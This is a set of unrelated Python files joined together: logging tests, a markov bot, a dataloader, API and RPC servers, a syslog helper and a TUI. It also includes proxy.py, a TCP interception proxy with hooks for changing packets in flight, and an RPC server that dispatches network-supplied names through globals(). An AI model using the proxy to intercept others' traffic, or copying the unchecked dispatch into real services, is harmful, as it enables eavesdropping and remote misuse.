self.assertEqual(log_record.severity_text, "WARNING")
self.assertEqual(log_record.severity_number, SeverityNumber.WARN)
self.assertEqual(log_record.trace_id, INVALID_SPAN_CONTEXT.trace_id)
self.assertEqual(log_record.span_id, INVALID_SPAN_CONTEXT.span_id)
self.assertEqual(
log_record.trace_flags, INVALID_SPAN_CONTEXT.trace_flags
)
exporter.clear()
tracer = trace.TracerProvider().get_tracer(__name__)
with tracer.start_as_current_span("test") as span:
logger.critical("Critical message within span")
finished_logs = exporter.get_finished_logs()
log_record = finished_logs[0].log_record
self.assertEqual(log_record.body, "Critical message within span")
self.assertEqual(log_record.severity_text, "CRITICAL")
self.assertEqual(log_record.severity_number, SeverityNumber.FATAL)
span_context = span.get_span_context()
self.assertEqual(log_record.trace_id, span_context.trace_id)
self.assertEqual(log_record.span_id, span_context.span_id)
self.assertEqual(log_record.trace_flags, span_context.trace_flags)
def test_simple_log_processor_shutdown(self):
exporter = InMemoryLogExporter()
log_emitter_provider = LogEmitterProvider()
log_emitter = log_emitter_provider.get_log_emitter(__name__)
log_emitter_provider.add_log_processor(SimpleLogProcessor(exporter))
logger = logging.getLogger("shutdown")
logger.addHandler(OTLPHandler(log_emitter=log_emitter))
logger.warning("Something is wrong")
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 1)
warning_log_record = finished_logs[0].log_record
self.assertEqual(warning_log_record.body, "Something is wrong")
self.assertEqual(warning_log_record.severity_text, "WARNING")
self.assertEqual(
warning_log_record.severity_number, SeverityNumber.WARN
)
exporter.clear()
log_emitter_provider.shutdown()
logger.warning("Log after shutdown")
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 0)
class TestBatchLogProcessor(ConcurrencyTestBase):
def test_emit_call_log_record(self):
exporter = InMemoryLogExporter()
log_processor = Mock(wraps=BatchLogProcessor(exporter))
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("emit_call")
logger.addHandler(OTLPHandler(log_emitter=emitter))
logger.error("error")
self.assertEqual(log_processor.emit.call_count, 1)
def test_shutdown(self):
exporter = InMemoryLogExporter()
log_processor = BatchLogProcessor(exporter)
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("shutdown")
logger.addHandler(OTLPHandler(log_emitter=emitter))
logger.warning("warning message: %s", "possible upcoming heatwave")
logger.error("Very high rise in temperatures across the globe")
logger.critical("Temparature hits high 420 C in Hyderabad")
log_processor.shutdown()
self.assertTrue(exporter._stopped)
finished_logs = exporter.get_finished_logs()
expected = [
("warning message: possible upcoming heatwave", "WARNING"),
("Very high rise in temperatures across the globe", "ERROR"),
            (
                "Temperature hits a high of 420 C in Hyderabad",
                "CRITICAL",
            ),
]
emitted = [
(item.log_record.body, item.log_record.severity_text)
for item in finished_logs
]
self.assertEqual(expected, emitted)
def test_force_flush(self):
exporter = InMemoryLogExporter()
log_processor = BatchLogProcessor(exporter)
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("force_flush")
logger.addHandler(OTLPHandler(log_emitter=emitter))
logger.critical("Earth is burning")
log_processor.force_flush()
finished_logs = exporter.get_finished_logs()
self.assertEqual(len(finished_logs), 1)
log_record = finished_logs[0].log_record
self.assertEqual(log_record.body, "Earth is burning")
self.assertEqual(log_record.severity_number, SeverityNumber.FATAL)
def test_log_processor_too_many_logs(self):
exporter = InMemoryLogExporter()
log_processor = BatchLogProcessor(exporter)
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("many_logs")
logger.addHandler(OTLPHandler(log_emitter=emitter))
for log_no in range(1000):
logger.critical("Log no: %s", log_no)
self.assertTrue(log_processor.force_flush())
        finished_logs = exporter.get_finished_logs()
        self.assertEqual(len(finished_logs), 1000)
def test_with_multiple_threads(self):
exporter = InMemoryLogExporter()
log_processor = BatchLogProcessor(exporter)
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("threads")
logger.addHandler(OTLPHandler(log_emitter=emitter))
def bulk_log_and_flush(num_logs):
for _ in range(num_logs):
logger.critical("Critical message")
self.assertTrue(log_processor.force_flush())
with ThreadPoolExecutor(max_workers=69) as executor:
futures = []
for idx in range(69):
future = executor.submit(bulk_log_and_flush, idx + 1)
futures.append(future)
executor.shutdown()
finished_logs = exporter.get_finished_logs()
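        # each of the 69 workers logs (idx + 1) records, so the total is
        # 1 + 2 + ... + 69 = 69 * 70 / 2 = 2415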
self.assertEqual(len(finished_logs), 2415)
@unittest.skipUnless(
hasattr(os, "fork") and sys.version_info >= (3, 7),
"needs *nix and minor version 7 or later",
)
def test_batch_log_processor_fork(self):
# pylint: disable=invalid-name
exporter = InMemoryLogExporter()
log_processor = BatchLogProcessor(
exporter,
max_export_batch_size=64,
schedule_delay_millis=10,
)
provider = LogEmitterProvider()
provider.add_log_processor(log_processor)
emitter = provider.get_log_emitter(__name__)
logger = logging.getLogger("test-fork")
logger.addHandler(OTLPHandler(log_emitter=emitter))
logger.critical("yolo")
time.sleep(0.5) # give some time for the exporter to upload
self.assertTrue(log_processor.force_flush())
self.assertEqual(len(exporter.get_finished_logs()), 1)
exporter.clear()
multiprocessing.set_start_method("fork")
def child(conn):
def _target():
logger.critical("Critical message child")
self.run_with_many_threads(_target, 100)
time.sleep(0.5)
logs = exporter.get_finished_logs()
conn.send(len(logs) == 100)
conn.close()
parent_conn, child_conn = multiprocessing.Pipe()
p = multiprocessing.Process(target=child, args=(child_conn,))
p.start()
self.assertTrue(parent_conn.recv())
p.join()
log_processor.shutdown()
class TestConsoleLogExporter(unittest.TestCase):
def test_export(self): # pylint: disable=no-self-use
"""Check that the console exporter prints log records."""
log_data = LogData(
log_record=LogRecord(
timestamp=int(time.time() * 1e9),
trace_id=2604504634922341076776623263868986797,
span_id=5213367945872657620,
trace_flags=TraceFlags(0x01),
severity_text="WARN",
severity_number=SeverityNumber.WARN,
name="name",
body="Zhengzhou, We have a heaviest rains in 1000 years",
resource=SDKResource({"key": "value"}),
attributes={"a": 1, "b": "c"},
),
instrumentation_info=InstrumentationInfo(
"first_name", "first_version"
),
)
exporter = ConsoleLogExporter()
# Mocking stdout interferes with debugging and test reporting, mock on
# the exporter instance instead.
with patch.object(exporter, "out") as mock_stdout:
exporter.export([log_data])
mock_stdout.write.assert_called_once_with(
log_data.log_record.to_json() + os.linesep
)
self.assertEqual(mock_stdout.write.call_count, 1)
self.assertEqual(mock_stdout.flush.call_count, 1)
def test_export_custom(self): # pylint: disable=no-self-use
"""Check that console exporter uses custom io, formatter."""
mock_record_str = Mock(str)
def formatter(record): # pylint: disable=unused-argument
return mock_record_str
mock_stdout = Mock()
exporter = ConsoleLogExporter(out=mock_stdout, formatter=formatter)
log_data = LogData(
log_record=LogRecord(),
instrumentation_info=InstrumentationInfo(
"first_name", "first_version"
),
)
exporter.export([log_data])
mock_stdout.write.assert_called_once_with(mock_record_str)
|
proxy.py | import sys
import socket
import threading
def server_loop(local_host, local_port, remote_host, remote_port, receive_first):
    """
    Server loop: print local connection info and spawn a thread
    to talk to the remote host for each incoming client.
    """
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.bind((local_host, local_port))
    except Exception:
        print ("[!!] Failed to listen on %s:%d" % (local_host, local_port))
        print ("[!!] Check for other listening sockets or correct permissions")
sys.exit(0)
print ("[*] Listening on %s:%d" % (local_host,local_port))
server.listen(5)
while True:
client_socket, addr = server.accept()
print ("[==>] Received incoming connection from %s:%d" % (addr[0],addr[1]))
proxy_thread = threading.Thread(target=proxy_handler, args=(client_socket, remote_host, remote_port, receive_first))
proxy_thread.start()
def proxy_handler(client_socket, remote_host, remote_port, receive_first):
    """
    Connect to the remote host and, if receive_first is set, read data
    from the remote end first. Received data is passed through the
    response handler and, if non-empty, sent on to the local client.
    """
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote_socket.connect((remote_host,remote_port))
if receive_first:
remote_buffer = receive_from(remote_socket)
hexdump(remote_buffer)
remote_buffer = response_handler(remote_buffer)
if len(remote_buffer):
print("[<==] Sending %d bytres to lcoalhost." % len(remote_buffer))
client_socket.send(remote_buffer)
while True:
local_buffer = receive_from(client_socket)
if len(local_buffer):
print("[<==] Sending %d bytes to localhost." % len(remote_buffer))
hexdump(local_buffer)
local_buffer = request_handler(local_buffer)
remote_socket.send(local_buffer)
print ("[==>] Sent to remote")
remote_buffer = receive_from(remote_socket)
if len(remote_buffer):
print("[<==] Received %d bytes from remote." % len(remote_buffer))
hexdump(remote_buffer)
remote_buffer = response_handler(remote_buffer)
client_socket.send(remote_buffer)
print ("[<==] Sent to localhost")
if not len(local_buffer) or not len(remote_buffer):
client_socket.close()
remote_socket.close()
print ("[*] No more data. Closing connections.")
break
def hexdump(src, length=16):
    """
    Pretty hex dumping function, adapted (and ported to Python 3)
    from the comments here:
    http://code.activestate.com/recipes/142812-hex-dumper/
    """
    # work on bytes internally; accept str for convenience
    if isinstance(src, str):
        src = src.encode()
    result = []
    for i in range(0, len(src), length):
        s = src[i:i + length]
        hexa = ' '.join("%02X" % b for b in s)
        text = ''.join(chr(b) if 0x20 <= b < 0x7F else '.' for b in s)
        result.append("%04X   %-*s   %s" % (i, length * 3, hexa, text))
    print('\n'.join(result))
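# Illustrative output of the ported hexdump above (spacing approximate):
#   hexdump(b"ABC\x00")
#   0000   41 42 43 00   ABC.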
def receive_from(connection):
    """
    Read data from the socket into a buffer until there
    is no more (or the 2 second timeout fires).
    """
    buffer = b""
    connection.settimeout(2)
    try:
        while True:
            data = connection.recv(4096)
            if not data:
                break
            buffer += data
    except socket.timeout:
        pass
    return buffer
def request_handler(buffer):
"""
Perform packet modifications.
Add modifications here to extend
"""
return buffer
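# A minimal sketch of the kind of modification request_handler() is meant
# to host (rewriting bytes in flight); the substitution below is purely
# illustrative and not part of the original tool:
#   def request_handler(buffer):
#       return buffer.replace(b"admin", b"guest")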
def response_handler(buffer):
"""
Perform any response
packet modifications here
to extend functionality
"""
return buffer
def main():
    # no fancy command-line parsing here
if len(sys.argv[1:]) != 5:
print ("Usage: ./proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]")
print ("Example ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True")
sys.exit(0)
# Setup local listening params
local_host = sys.argv[1]
local_port = int(sys.argv[2])
# setup remote target
remote_host = sys.argv[3]
remote_port = int(sys.argv[4])
# this tells our proxy to connect and receive data
# before sending to the remote host
receive_first = sys.argv[5]
if "True" in receive_first:
receive_first = True
else:
receive_first = False
#now spin up a listening socket
server_loop(local_host, local_port, remote_host, remote_port, receive_first)
if __name__ == '__main__':
    main()
|
rdbot.py | import asyncio
import configparser
import os
import threading
from datetime import datetime
from pathlib import Path
from mi.ext import commands, tasks
from mi.framework import Note
from mi.framework.router import Router
from roboduck import *
# Load Misskey configuration
config = configparser.ConfigParser()
config.read(Path(__file__).parent.joinpath('bot.cfg'))
uri = "https://" + config.get("misskey", "instance_write")
token = config.get("misskey", "token")
contentwarning = config.get("misskey", "cw")
if contentwarning.lower() == "none":
contentwarning = None
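# Illustrative bot.cfg layout, inferred from the config.get() calls above
# (the values are placeholders, not working credentials):
#   [misskey]
#   instance_write = misskey.example
#   token = YOUR_API_TOKEN
#   cw = none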
class MyBot(commands.Bot):
    text_model = None  # Holds the markov object so it is not recreated every time
def __init__(self):
super().__init__()
@tasks.loop(3600)
async def loop_1h(self):
text = create_sentence()
await bot.client.note.send(content=text, visibility="home", cw=contentwarning)
@tasks.loop(43200)
async def loop_12h(self):
thread_update = threading.Thread(target=update)
thread_update.daemon = True
thread_update.start()
async def on_ready(self, ws):
await Router(ws).connect_channel(["global", "main"]) # Connect to global and main channels
await bot.client.note.send(content=datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " :roboduck: Bot started!",
visibility="specified")
        self.loop_12h.start()  # renew the markov model every 12 hours
        self.loop_1h.start()   # post a generated note every hour
print(datetime.now().strftime('%Y-%m-%d %H:%M:%S') + " Roboduck Bot started!")
async def on_mention(self, note: Note):
if not note.author.is_bot:
text = note.author.action.get_mention() + " "
text += create_sentence()
await note.reply(content=text, cw=contentwarning) # Reply to a note
async def on_reconnect(self, ws):
await Router(ws).connect_channel(["global", "main"]) # Connect to global and main channels
if __name__ == "__main__":
databasepath = Path(__file__).parent.joinpath('roboduck.db')
if not (os.path.exists(databasepath) and os.stat(databasepath).st_size != 0):
init_bot()
bot = MyBot()
asyncio.run(bot.start(uri, token, timeout=600))
|
dataloader.py | import ujson
import gzip
import numpy as np
import random
import threading
import time
from path_to_data import image_path_to_image_and_distribution_tensor
class DataLoader(object):
SATURATION_THRESHOLD = 0.1
OUTPUT_IMAGE_SIZE = 64
INPUT_IMAGE_SIZE = 256
TRAIN_SOURCE = '../dataset_indexes/imagenet_train_256_saturation_values.json.gz'
VALIDATION_SOURCE = '../dataset_indexes/imagenet_human_validation_set.json'
CATEGORY_SOURCE = '../dataset_indexes/imagenet_train_256_category_paths_reweighted.json.gz'
# This is the per-example probability that an example will be pulled from a specific category.
# This encourages that images from the same category show up together more often.
CATEGORY_REWEIGHT_ALPHA = 0.1
def __init__(self, batch_size, use_imagenet=True, batching_style="reweighted"):
self.batch_size = batch_size
self.batching_style = batching_style
self._load_paths_and_threshold(use_imagenet)
self.training_batches = []
self.batches_available = threading.Semaphore(0)
self.DESIRED_QUEUED_BATCHES = 3
if use_imagenet:
self.root = '../../datasets/imagenet/train256/'
self.validation_root = '../../datasets/imagenet/val256/'
else:
print "Don't know where the places_2 root is!"
raise
def get_filenames_for_batch(self):
'''
Returns a list of filenames. Uses value from self.batching_style.
'''
paths = []
if self.batching_style == "reweighted":
# Pick a category to focus on.
focus_category = self.categories[int(random.random()*len(self.categories))]
category_filenames = self.category_index[focus_category]
            for i in range(self.batch_size):
if random.random() <= self.CATEGORY_REWEIGHT_ALPHA:
paths.append(category_filenames[int(random.random()*len(category_filenames))])
else:
paths.append(self.all_paths[int(random.random() * len(self.all_paths))])
else:
            paths = [self.all_paths[int(random.random() * len(self.all_paths))] for i in range(self.batch_size)]
return paths
def next_batch(self):
"""Gets the next batch from the dataset and starts loading others in parallel."""
# Make sure that we always have enough batches precomputed
        for b in range(self.DESIRED_QUEUED_BATCHES - len(self.training_batches)):
threading.Thread(target = self._load_batch).start()
self.batches_available.acquire() # Wait for a new batch
data_x, data_y_, data_y_rebalance = self.training_batches[0]
del self.training_batches[0]
return data_x, data_y_, data_y_rebalance
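    # Hedged usage sketch (argument values are illustrative only):
    #   loader = DataLoader(batch_size=32, use_imagenet=True)
    #   x, y_, y_rebalance = loader.next_batch()
    # next_batch() keeps DESIRED_QUEUED_BATCHES batches preloading in
    # background threads, so the call above rarely blocks.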
def get_validation_batch(self):
x_batch = np.zeros((len(self.validation_paths), self.INPUT_IMAGE_SIZE, self.INPUT_IMAGE_SIZE, 1))
y__batch = np.zeros((len(self.validation_paths), self.OUTPUT_IMAGE_SIZE, self.OUTPUT_IMAGE_SIZE, 313))
gt_batch = np.zeros((len(self.validation_paths), self.INPUT_IMAGE_SIZE, self.INPUT_IMAGE_SIZE, 3))
for i in range(len(self.validation_paths)):
path = self.validation_paths[i]
x, y_, _, ground_truth= image_path_to_image_and_distribution_tensor(self.validation_root + path)
x_batch[i, ...] = x.reshape((256, 256, 1))
y__batch[i, ...] = y_
gt_batch[i, ...] = ground_truth
return x_batch, y__batch, gt_batch
def _load_batch(self):
"""Load the next batch, queue it, and increase the semaphore."""
lt = time.time()
x_batch = np.zeros((self.batch_size, self.INPUT_IMAGE_SIZE, self.INPUT_IMAGE_SIZE, 1))
y__batch = np.zeros((self.batch_size, self.OUTPUT_IMAGE_SIZE, self.OUTPUT_IMAGE_SIZE, 313))
y_reweight_batch = np.zeros((self.batch_size, self.OUTPUT_IMAGE_SIZE, self.OUTPUT_IMAGE_SIZE))
paths = self.get_filenames_for_batch()
for i,path in enumerate(paths):
x, y_, y_reweight, _ = image_path_to_image_and_distribution_tensor(self.root + path)
x_batch[i, ...] = x.reshape((256, 256, 1))
y__batch[i, ...] = y_
y_reweight_batch[i, ...] = y_reweight
self.training_batches.append((x_batch, y__batch, y_reweight_batch))
self.batches_available.release()
print "Batch loaded in parallel ", (time.time() - lt)
def _load_paths_and_threshold(self, use_imagenet):
'''Loads all the paths and removes those below the saturation threshold.'''
if self.batching_style == "reweighted":
# Take the file list from the reweighted category list
f = ujson.load(gzip.open(self.CATEGORY_SOURCE, 'rt'))
self.all_paths = []
            for category, paths in f.items():
                # NOTE: the original comparison `path > self.SATURATION_THRESHOLD`
                # compared a path string to a float (always True on Python 2),
                # so the category file is effectively used unfiltered here.
                self.all_paths += list(paths)
else:
f = ujson.load(gzip.open(self.TRAIN_SOURCE, 'rt'))
self.all_paths = [path for path in f.keys() if f[path] > self.SATURATION_THRESHOLD]
vf = ujson.load(open(self.VALIDATION_SOURCE, 'rt'))
self.validation_paths = [path for path in vf.keys() if vf[path] > self.SATURATION_THRESHOLD]
self.category_index = ujson.load(gzip.open(self.CATEGORY_SOURCE, 'rt'))
        self.categories = list(self.category_index.keys())
|
rest_api_endpoint.py | """
Copyright (c) 2015 SONATA-NFV and Paderborn University
ALL RIGHTS RESERVED.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Neither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]
nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written
permission.
This work has been performed in the framework of the SONATA project,
funded by the European Commission under Grant number 671517 through
the Horizon 2020 and 5G-PPP programmes. The authors would like to
acknowledge the contributions of their colleagues of the SONATA
partner consortium (www.sonata-nfv.eu).
"""
import logging
import threading
from flask import Flask
from flask_restful import Api
from gevent.pywsgi import WSGIServer  # gevent.wsgi was removed in newer gevent releases
# need to import total module to set its global variable dcs
import compute
from compute import dcs, ComputeList, Compute, ComputeResources, DatacenterList, DatacenterStatus
# need to import total module to set its global variable net
import network
from network import NetworkAction, DrawD3jsgraph
import monitor
from monitor import MonitorInterfaceAction, MonitorFlowAction, MonitorLinkAction, MonitorSkewAction, MonitorTerminal
import pkg_resources
from os import path
logging.basicConfig(level=logging.INFO)
class RestApiEndpoint(object):
"""
Simple API endpoint that offers a REST
interface. This interface will be used by the
default command line client.
"""
def __init__(self, listenip, port, DCnetwork=None):
self.ip = listenip
self.port = port
# connect this DC network to the rest api endpoint (needed for the networking and monitoring api)
self.connectDCNetwork(DCnetwork)
# setup Flask
# find directory of dashboard files
dashboard_file = pkg_resources.resource_filename('emuvim.dashboard', "index.html")
dashboard_dir = path.dirname(dashboard_file)
logging.info("Started emu dashboard: {0}".format(dashboard_dir))
self.app = Flask(__name__, static_folder=dashboard_dir, static_url_path='/dashboard')
self.api = Api(self.app)
# setup endpoints
# compute related actions (start/stop VNFs, get info)
self.api.add_resource(Compute, "/restapi/compute/<dc_label>/<compute_name>")
self.api.add_resource(ComputeList,
"/restapi/compute",
"/restapi/compute/<dc_label>")
self.api.add_resource(ComputeResources, "/restapi/compute/resources/<dc_label>/<compute_name>")
self.api.add_resource(DatacenterStatus, "/restapi/fog/<dc_label>")
self.api.add_resource(DatacenterList, "/restapi/fog")
# network related actions (setup chaining between VNFs)
self.api.add_resource(NetworkAction,
"/restapi/network")
self.api.add_resource(DrawD3jsgraph,
"/restapi/network/d3jsgraph")
# monitoring related actions
# export a network interface traffic rate counter
self.api.add_resource(MonitorInterfaceAction,
"/restapi/monitor/interface")
# export flow traffic counter, of a manually pre-installed flow entry, specified by its cookie
self.api.add_resource(MonitorFlowAction,
"/restapi/monitor/flow")
# install monitoring of a specific flow on a pre-existing link in the service.
# the traffic counters of the newly installed monitor flow are exported
self.api.add_resource(MonitorLinkAction,
"/restapi/monitor/link")
        # install skewness monitor of resource usage distribution
# the skewness metric is exported
self.api.add_resource(MonitorSkewAction,
"/restapi/monitor/skewness")
# start a terminal window for the specified vnfs
self.api.add_resource(MonitorTerminal,
"/restapi/monitor/term")
logging.debug("Created API endpoint %s(%s:%d)" % (self.__class__.__name__, self.ip, self.port))
def connectFog(self, dc):
compute.dcs[dc.label] = dc
logging.info(
"Connected DC(%s) to API endpoint %s(%s:%d)" % (dc.label, self.__class__.__name__, self.ip, self.port))
def connectDCNetwork(self, DCnetwork):
network.net = DCnetwork
monitor.net = DCnetwork
logging.info("Connected DCNetwork to API endpoint %s(%s:%d)" % (
self.__class__.__name__, self.ip, self.port))
def start(self):
thread = threading.Thread(target=self._start_flask, args=())
thread.daemon = True
thread.start()
logging.info("Started API endpoint @ http://%s:%d" % (self.ip, self.port))
def _start_flask(self):
#self.app.run(self.ip, self.port, debug=False, use_reloader=False)
        # this should be a more production-ready HTTP server
#self.app.logger.setLevel(logging.ERROR)
http_server = WSGIServer((self.ip, self.port),
self.app,
log=open("/dev/null", "w") # This disables HTTP request logs to not mess up the CLI when e.g. the auto-updated dashboard is used
)
http_server.serve_forever()
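# Hedged usage sketch (object names are placeholders; the constructor
# signature and methods come from the class above):
#   api = RestApiEndpoint("0.0.0.0", 5001, DCnetwork=net)
#   api.connectFog(dc)
#   api.start()
# After start(), e.g. GET /restapi/fog lists the connected datacenters.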
|
nanomsg.py | import json
import threading
from functools import lru_cache
import pynng
# RPCError and any remaining helpers come from the package's common module
from .common import *
class NanomsgRPCServer:
@staticmethod
def ping():
return 'pong'
@staticmethod
def new_req(name: str, *args, **kwargs):
return json.dumps(dict(name=name, args=args, kwargs=kwargs)).encode()
def __init__(self, url):
self.url = url
self.__reset__()
def __reset__(self):
self._running = False
self._rep_socket = pynng.Rep0()
def __start__(self):
if not self._running:
t = threading.Thread(target=self.__run__, daemon=True)
t.start()
else:
raise RPCError('thread still running, or stopped incorrectly')
def __stop__(self):
self.__send_result__(True)
self._rep_socket.close()
self.__reset__()
def __run__(self):
self._rep_socket.listen(self.url)
self._running = True
print('running')
while self._running:
try:
q = self.__receive_request__()
name = q['name']
target = self.__find_call_target__(name)
args = q['args']
kwargs = q['kwargs']
r = target(*args, **kwargs)
try:
self.__send_result__(r)
except pynng.BadState:
if name != 'stop':
raise
except Exception as e:
self.__send_error__(e)
@lru_cache()
def __find_call_target__(self, name):
try:
return getattr(self, name)
except AttributeError:
try:
return globals()[name]
except KeyError:
raise NameError(name)
def __send_dict__(self, d):
try:
s = json.dumps(d, ensure_ascii=False).encode()
except Exception as e:
self.__send_error__(e)
else:
self._rep_socket.send(s)
def __receive_request__(self):
return json.loads(self._rep_socket.recv())
def __send_error__(self, e: Exception):
d = dict(ok=False, error=f'Python Exception: {type(e).__name__}: {e}')
self.__send_dict__(d)
def __send_result__(self, json_obj):
d = dict(ok=True, result=json_obj)
self.__send_dict__(d)
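# Minimal client-side sketch for the request/response protocol above.
# pynng.Req0 is the matching peer for pynng.Rep0; everything below is
# illustrative and not part of this module:
#   req = pynng.Req0()
#   req.dial(url)
#   req.send(NanomsgRPCServer.new_req('ping'))
#   reply = json.loads(req.recv())  # -> {'ok': True, 'result': 'pong'}
#   req.close()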
|
syslog.py | # -*- coding: utf-8 -*-
"""Syslog utility for tests."""
import logging
import threading
from six.moves import socketserver
logger = logging.getLogger(__name__)
class SyslogUDPHandler(socketserver.BaseRequestHandler):
"""Syslog UDP dummy handler."""
outputHandle = None
def handle(self):
"""Handle incoming data by logging to debug and writing to logfie."""
data = bytes.decode(self.request[0].strip())
logger.debug(data)
self.outputHandle.write(data)
self.outputHandle.flush()
def runSyslogServer(host, port, logfile):
"""Run a dummy syslog server.
:param host: IP address to listen
:param port: Port to listen
:param logfile: File handle used to write incoming logs
"""
logfilehandle = open(logfile, "w+")
handler = SyslogUDPHandler
handler.outputHandle = logfilehandle
syslogd = socketserver.UDPServer((host, port), handler)
def serve():
syslogd.serve_forever()
thread = threading.Thread(target=serve)
thread.start()
return syslogd
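# Hedged usage sketch (host, port and path are placeholders):
#   syslogd = runSyslogServer("127.0.0.1", 5140, "/tmp/syslog-test.log")
#   ... exercise the code under test, then tear down:
#   syslogd.shutdown()  # stops serve_forever() so the thread can exit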
|
trex_tui.py | from __future__ import print_function
import termios
import sys
import os
import time
import threading
from collections import OrderedDict, deque
from texttable import ansi_len
import datetime
import readline
if sys.version_info > (3,0):
from io import StringIO
else:
from cStringIO import StringIO
from ..utils.text_opts import *
from ..utils.common import list_intersect
from ..utils import text_tables
from ..utils.filters import ToggleFilter
from ..common.trex_exceptions import TRexError
from ..astf.trex_astf_exceptions import ASTFErrorBadTG
class TUIQuit(Exception):
pass
def ascii_split (s):
output = []
lines = s.split('\n')
for elem in lines:
if ansi_len(elem) > 0:
output.append(elem)
return output
class SimpleBar(object):
def __init__ (self, desc, pattern):
self.desc = desc
self.pattern = pattern
self.pattern_len = len(pattern)
self.index = 0
def show (self, buffer):
if self.desc:
print(format_text("{0} {1}".format(self.desc, self.pattern[self.index]), 'bold'), file = buffer)
else:
print(format_text("{0}".format(self.pattern[self.index]), 'bold'), file = buffer)
self.index = (self.index + 1) % self.pattern_len
# base type of a panel
class TrexTUIPanel(object):
def __init__ (self, mng, name):
self.mng = mng
self.name = name
self.client = mng.client
self.is_graph = False
def show (self, buffer):
raise NotImplementedError("must implement this")
def get_key_actions (self):
raise NotImplementedError("must implement this")
def get_name (self):
return self.name
# dashboard panel
class TrexTUIDashBoard(TrexTUIPanel):
FILTER_ACQUIRED = 1
FILTER_ALL = 2
def __init__ (self, mng):
super(TrexTUIDashBoard, self).__init__(mng, "dashboard")
self.ports = self.client.get_all_ports()
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
self.key_actions['p'] = {'action': self.action_pause, 'legend': 'pause', 'show': True, 'color': 'red'}
self.key_actions['r'] = {'action': self.action_resume, 'legend': 'resume', 'show': True, 'color': 'blue'}
self.key_actions['o'] = {'action': self.action_show_owned, 'legend': 'owned ports', 'show': True}
self.key_actions['n'] = {'action': self.action_reset_view, 'legend': 'reset view', 'show': True}
self.key_actions['a'] = {'action': self.action_show_all, 'legend': 'all ports', 'show': True}
# register all the ports to the toggle action
for port_id in self.ports:
self.key_actions[str(port_id)] = {'action': self.action_toggle_port(port_id), 'legend': 'port {0}'.format(port_id), 'show': False}
self.toggle_filter = ToggleFilter(self.ports)
if self.client.get_acquired_ports():
self.action_show_owned()
else:
self.action_show_all()
def get_showed_ports (self):
return self.toggle_filter.filter_items()
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.get_showed_ports():
self.client._show_port_stats(ports = self.get_showed_ports(), buffer = buffer)
def get_key_actions (self):
allowed = OrderedDict()
allowed['n'] = self.key_actions['n']
allowed['o'] = self.key_actions['o']
allowed['a'] = self.key_actions['a']
for i in self.ports:
allowed[str(i)] = self.key_actions[str(i)]
if self.get_showed_ports():
allowed['c'] = self.key_actions['c']
# if not all ports are acquired - no operations
if not (set(self.get_showed_ports()) <= set(self.client.get_acquired_ports())):
return allowed
if self.client.get_mode() == 'STL':
# if any/some ports can be resumed
if set(self.get_showed_ports()) & set(self.client.get_paused_ports()):
allowed['r'] = self.key_actions['r']
# if any/some ports are transmitting - support those actions
if set(self.get_showed_ports()) & set(self.client.get_transmitting_ports()):
allowed['p'] = self.key_actions['p']
return allowed
######### actions
def action_pause (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_transmitting_ports())
try:
rc = self.client.pause(ports = ports)
except TRexError:
pass
return ""
def action_resume (self):
ports = list_intersect(self.get_showed_ports(), self.client.get_paused_ports())
try:
self.client.resume(ports = ports)
except TRexError:
pass
return ""
def action_reset_view (self):
self.toggle_filter.reset()
return ""
def action_show_owned (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_acquired_ports())
return ""
def action_show_all (self):
self.toggle_filter.reset()
self.toggle_filter.toggle_items(*self.client.get_all_ports())
return ""
def action_clear (self):
self.client.clear_stats(self.toggle_filter.filter_items())
return "cleared all stats"
def action_toggle_port(self, port_id):
def action_toggle_port_x():
self.toggle_filter.toggle_item(port_id)
return ""
return action_toggle_port_x
# streams stats
class TrexTUIStreamsStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUIStreamsStats, self).__init__(mng, "sstats")
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
self.client._show_streams_stats(buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_clear (self):
self.client.pgid_stats.clear_stats()
return ""
# latency stats
class TrexTUILatencyStats(TrexTUIPanel):
def __init__ (self, mng):
super(TrexTUILatencyStats, self).__init__(mng, "lstats")
self.key_actions = OrderedDict()
self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
self.key_actions['h'] = {'action': self.action_toggle_histogram, 'legend': 'histogram toggle', 'show': True}
self.is_histogram = False
def show (self, buffer):
self.client._show_global_stats(buffer = buffer)
if self.is_histogram:
self.client._show_latency_histogram(buffer = buffer)
else:
self.client._show_latency_stats(buffer = buffer)
def get_key_actions (self):
return self.key_actions
def action_toggle_histogram (self):
self.is_histogram = not self.is_histogram
return ""
def action_clear (self):
self.client.pgid_stats.clear_stats()
return ""
class TrexTUIAstfTrafficStats(TrexTUIPanel):
def __init__(self, mng):
super(TrexTUIAstfTrafficStats, self).__init__(mng, "astats")
self.start_row = 0
